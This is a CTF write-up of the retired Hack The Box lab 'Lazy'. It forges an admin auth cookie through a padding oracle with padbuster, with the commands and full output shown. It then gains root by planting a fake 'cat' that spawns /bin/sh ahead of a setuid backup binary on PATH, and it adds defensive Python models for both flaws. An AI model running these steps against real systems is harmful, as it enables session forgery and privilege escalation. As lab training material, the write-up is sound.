Today we are going to solve the CTF challenge “Lazy”, a lab developed by Hack The Box. They have an amazing collection of online labs on which you can practice your penetration testing skills, with labs designed for everyone from beginners to expert penetration testers. Lazy is a retired lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online, they have a static IP. The Lazy lab has IP 10.10.10.18.
Now, as always, let’s begin with port enumeration.
c:\Users\jacco>nmap -sC -sV 10.10.10.18
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-09 19:43 W. Europe Standard Time
Nmap scan report for 10.10.10.18
Host is up (0.028s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
|   2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
|   256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_  256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.15 seconds
Port 80 is open, so let’s open the IP in a browser to see whether a website is hosted there. We were greeted by a simple page with Register and Login links; clicking Register opens up a form.
I first tried to register with admin as the username and 123 as the password.
But I got the alert “Duplicate entry ‘admin’ for key PRIMARY” (a raw database error echoed straight back to the browser) together with the error “can’t create the user: user exists”. So the username “admin” is already registered.
Next, I used Burp Suite to capture the browser request, this time registering with puck as the username and iestyle as the password.
In the intercepted request I saw an auth cookie. I sent the request to Repeater to analyse its response, and it gave a hint: “invalid padding”. A server that tells the client whether a cookie’s padding is valid is the basis of a padding oracle vulnerability (to learn more about padding oracles, see our earlier article on the subject). Since I had faced such a situation before, I knew what to do next.
Next, run padbuster from a terminal with the target URL, the block size and the auth cookie copied above. The end of the output shows the decrypted value in Base64, HEX and ASCII: the auth cookie decrypts to user=puck, so the server identifies the logged-in user purely by the name carried in this cookie. We are very near our goal: all we need is the same cookie encrypted for user=admin, which padbuster’s encrypt mode (-plaintext) produces through the same oracle.
root@kali:~/htb/lazy# padbuster http://10.10.10.18 gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 8 -cookies auth=gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 -encoding 0

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 978

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       200     1133    N/A
2 **    255     200     15      N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (132/256) [Byte 8]
[+] Success: (58/256) [Byte 7]
[+] Success: (176/256) [Byte 6]
[+] Success: (24/256) [Byte 5]
[+] Success: (205/256) [Byte 4]
[+] Success: (34/256) [Byte 3]
[+] Success: (96/256) [Byte 2]
[+] Success: (1/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): 6af32daa51efabef
[+] Intermediate Bytes (HEX): f7a7d836ec53c47d
[+] Plain Text: user=puc
Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.

*** Starting Block 2 of 2 ***

[+] Success: (23/256) [Byte 8]
[+] Success: (82/256) [Byte 7]
[+] Success: (21/256) [Byte 6]
[+] Success: (174/256) [Byte 5]
[+] Success: (88/256) [Byte 4]
[+] Success: (212/256) [Byte 3]
[+] Success: (13/256) [Byte 2]
[+] Success: (247/256) [Byte 1]

Block 2 Results:
[+] Cipher Text (HEX): 1a65707e261e577c
[+] Intermediate Bytes (HEX): 01f42aad56e8ace8
[+] Plain Text: k

-------------------------------------------------------
** Finished ***

[+] Decrypted value (ASCII): user=puck

[+] Decrypted value (HEX): 757365723D7075636B07070707070707

[+] Decrypted value (Base64): dXNlcj1wdWNrBwcHBwcHBw==

-------------------------------------------------------
root@kali:~/htb/lazy# padbuster http://10.10.10.18 gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 8 -cookies auth=gtS9RNEjsR5q8y2qUe%2Br7xplcH4mHld8 -encoding 0 -plaintext user=admin

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 978

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       200     1133    N/A
2 **    255     200     15      N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (196/256) [Byte 8]
[+] Success: (148/256) [Byte 7]
[+] Success: (92/256) [Byte 6]
[+] Success: (41/256) [Byte 5]
[+] Success: (218/256) [Byte 4]
[+] Success: (136/256) [Byte 3]
[+] Success: (150/256) [Byte 2]
[+] Success: (190/256) [Byte 1]

Block 2 Results:
[+] New Cipher Text (HEX): 23037825d5a1683b
[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d

[+] Success: (1/256) [Byte 8]
[+] Success: (36/256) [Byte 7]
[+] Success: (180/256) [Byte 6]
[+] Success: (17/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (50/256) [Byte 3]
[+] Success: (132/256) [Byte 2]
[+] Success: (135/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------
root@kali:~/htb/lazy#
Now replace the original auth cookie with the encrypted value produced above and forward the intercepted request.
When Burp Suite sends the request, the web server logs you in as the admin account. On the admin page you will find a “my key” link that offers a username, mitsos, and an SSH key.
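Why the forgery above worked, and how the application should have been written, as a stdlib-only Python model added here (not code from the writeup or from the Lazy application). It assumes an 8-byte block cipher, faked with a toy HMAC-based Feistel permutation, and caller-supplied keys and IV; distinct_responses reproduces the 1-versus-255 split that padbuster's response analysis reported, while the encrypt-then-MAC version answers every tampered cookie identically, so no oracle exists.

```python
import hashlib, hmac, secrets
BLOCK = 8  # 8-byte blocks, the size padbuster reported for the Lazy cookie
def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))
def _prp(key, block, decrypt=False):
    # Toy 4-round Feistel (HMAC-SHA256 round function) standing in for the
    # server's 8-byte block cipher; walking the rounds backwards inverts it.
    l, r = block[:4], block[4:]
    for i in (range(3, -1, -1) if decrypt else range(4)):
        l, r = r, _xor(l, hmac.new(key, bytes([i]) + r, hashlib.sha256).digest())
    return r + l
def cbc_seal(key, user, iv=None):
    # Cookie body = IV || CBC(PKCS#7-padded "user=<name>"); no integrity check.
    iv, n = iv or secrets.token_bytes(BLOCK), BLOCK - len(user) % BLOCK
    out = prev = iv
    for i in range(0, len(user) + n, BLOCK):
        prev = _prp(key, _xor((user + bytes([n]) * n)[i:i + BLOCK], prev))
        out += prev
    return out
def cbc_open(key, body):
    # CBC-decrypt and strip the padding; raises on bad padding like the Lazy app.
    blocks = [body[i:i + BLOCK] for i in range(0, len(body), BLOCK)]
    pt = b"".join(_xor(_prp(key, c, True), p) for p, c in zip(blocks, blocks[1:]))
    n = pt[-1]
    if not 1 <= n <= BLOCK or pt[-n:] != bytes([n]) * n:
        raise ValueError("invalid padding")
    return pt[:-n]
def vulnerable_check(key, cookie):
    # Lazy-style: a padding failure is reported verbatim, so a tampered cookie
    # gets one of two distinguishable answers. That difference is the oracle.
    try:
        cbc_open(key, cookie)
    except ValueError:
        return "invalid padding"
    return "ok"
def hardened_cookie(enc_key, mac_key, user, iv=None):
    body = cbc_seal(enc_key, user, iv)  # encrypt-then-MAC over IV || ciphertext
    return body + hmac.new(mac_key, body, hashlib.sha256).digest()
def hardened_check(enc_key, mac_key, cookie):
    # Constant-time tag check before any decryption: a tampered cookie never
    # reaches the padding code, so every forgery gets the same single answer.
    body, tag = cookie[:-32], cookie[-32:]
    if not hmac.compare_digest(tag, hmac.new(mac_key, body, hashlib.sha256).digest()):
        return "invalid cookie"
    cbc_open(enc_key, body)
    return "ok"
def distinct_responses(check, cookie, pos):
    # Self-check: flip byte `pos` through all 255 other values and collect the
    # answers; more than one distinct answer means the scheme leaks.
    return {check(cookie[:pos] + bytes([cookie[pos] ^ d]) + cookie[pos + 1:]) for d in range(1, 256)}
```

Flipping the last byte of the first ciphertext block (offset 15 of IV||C1||C2) lands on the plaintext's last padding byte, which is exactly the byte padbuster attacks first.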
Opening the link shows the SSH private key; save it into a text file named “key” on the desktop. Notice that the URL also reveals the SSH login username, mitsos.
With the key downloaded and given appropriate permissions, we now have both the SSH username and the key, so let’s get an SSH session.
PS C:\PENTEST\htb\LAZY> ssh -i key mitsos@10.10.10.18
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Mar  9 20:39:46 EET 2019

  System load:  0.0               Processes:           174
  Usage of /:   7.7% of 18.58GB   Users logged in:     0
  Memory usage: 11%               IP address for eth0: 10.10.10.18
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Last login: Sat Mar  9 20:39:47 2019 from 10.10.14.20
mitsos@LazyClown:~$ ls
backup  peda  user.txt
mitsos@LazyClown:~$ cat user.txt
d55*****3fc
As seen above, the home directory also contains a peda folder and a backup executable. Running backup prints the shadow file with the users’ password hashes, so we ran strings on it and found that it embeds the command “cat /etc/shadow” (alongside an import of system, so the command is run through the shell):
mitsos@LazyClown:~$ strings backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
system
__libc_start_main
__gmon_start__
GLIBC_2.0
PTRh
[^_]
cat /etc/shadow
;*2$"
GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4
.symtab
.strtab
Since backup is setuid root and invokes cat by name rather than by an absolute path, all we need is our own executable named cat that is found first in PATH. As shown below, we “reprogram” cat to give us a shell when backup executes it.
mitsos@LazyClown:~$ ls -la
total 64
drwxr-xr-x 5 mitsos mitsos 4096 May  3  2017 .
drwxr-xr-x 3 root   root   4096 May  2  2017 ..
-rwsrwsr-x 1 root   root   7303 May  3  2017 backup
-rw------- 1 mitsos mitsos  224 May  3  2017 .bash_history
-rw-r--r-- 1 root   root      1 May  3  2017 .bash.history
-rw-r--r-- 1 mitsos mitsos  220 May  2  2017 .bash_logout
-rw-r--r-- 1 mitsos mitsos 3637 May  2  2017 .bashrc
drwx------ 2 mitsos mitsos 4096 May  2  2017 .cache
-rw------- 1 mitsos mitsos 2524 May  2  2017 .gdb_history
-rw-rw-r-- 1 mitsos mitsos   22 May  2  2017 .gdbinit
-rw------- 1 root   root     46 May  2  2017 .nano_history
drwxrwxr-x 4 mitsos mitsos 4096 May  2  2017 peda
-rw-r--r-- 1 mitsos mitsos  675 May  2  2017 .profile
drwxrwxr-x 2 mitsos mitsos 4096 May  2  2017 .ssh
-r--r--r-- 1 mitsos mitsos   33 Jan 18  2018 user.txt
mitsos@LazyClown:~$ export PATH=.:$PATH
mitsos@LazyClown:~$ echo "/bin/sh" > cat
mitsos@LazyClown:~$ chmod 777 cat
mitsos@LazyClown:~$ ./backup
# whoami
root
# cd /
# ls
root.txt
# less root.txt
990*****515
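The same two ingredients from a defender's side, as example code added here (not from the writeup or the box): a small audit that parses the mode field of ls -l and scans strings output for a setuid-root binary that runs a shell command whose program is looked up through PATH. The COMMON_TOOLS list and the command regex are heuristics of my own, the sample inputs are constructed from the output shown above, and the fix for a binary like backup is an absolute path (or execve without a shell) plus a sanitised environment.

```python
import re

# Utilities a setuid helper is likely to invoke through system(); a bare name
# here is resolved through the caller's PATH, which the caller controls.
COMMON_TOOLS = {"cat", "cp", "mv", "tar", "ls", "rm", "sh", "bash", "gzip", "find"}
CMD_RE = re.compile(r"^([A-Za-z0-9_.\-/]+)(?:\s+(\S.*))?$")

def parse_mode(ls_mode):
    # Parse the 10-character mode field of `ls -l` (e.g. "-rwsrwsr-x");
    # returns (setuid, setgid, world_writable).
    if len(ls_mode) != 10:
        raise ValueError("expected a 10-character ls mode string")
    return ls_mode[3] in "sS", ls_mode[6] in "sS", ls_mode[8] == "w"

def audit_strings(strings_output):
    # Flag signs of PATH-dependent command execution in `strings` output: an
    # imported system() and command-looking strings whose program has no path.
    lines = [l.strip() for l in strings_output.splitlines()]
    findings = []
    if "system" in lines:
        findings.append("imports system(): runs commands via /bin/sh in the caller's environment")
    for line in lines:
        m = CMD_RE.match(line)
        if not m or not m.group(2) or "/" in m.group(1):
            continue  # not a command, no arguments, or already an absolute path
        prog, args = m.groups()
        if prog in COMMON_TOOLS or args[0] in "/-":
            findings.append(f"command {line!r}: {prog!r} is looked up through PATH")
    return findings

def audit(ls_line, strings_output):
    # Setuid-root binary + PATH-dependent command string = privilege escalation.
    fields = ls_line.split()
    setuid, setgid, _ = parse_mode(fields[0])
    findings = audit_strings(strings_output)
    high_risk = setuid and fields[2] == "root" and any("PATH" in f for f in findings)
    return {"owner": fields[2], "setuid": setuid, "setgid": setgid,
            "findings": findings, "high_risk": high_risk}

# Constructed sample: an excerpt of the `strings backup` and `ls -la` output
# shown in the writeup above.
LAZY_STRINGS = """/lib/ld-linux.so.2
libc.so.6
system
__libc_start_main
cat /etc/shadow
GCC: (Ubuntu 4.8.4-2ubuntu1~14.04.3) 4.8.4
"""
LAZY_LS = "-rwsrwsr-x 1 root root 7303 May 3 2017 backup"
```

Run over the constructed excerpt, audit(LAZY_LS, LAZY_STRINGS) reports two findings and marks the binary high risk; the same strings with "/bin/cat /etc/shadow" produce no PATH finding.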
Author: Jacco Straathof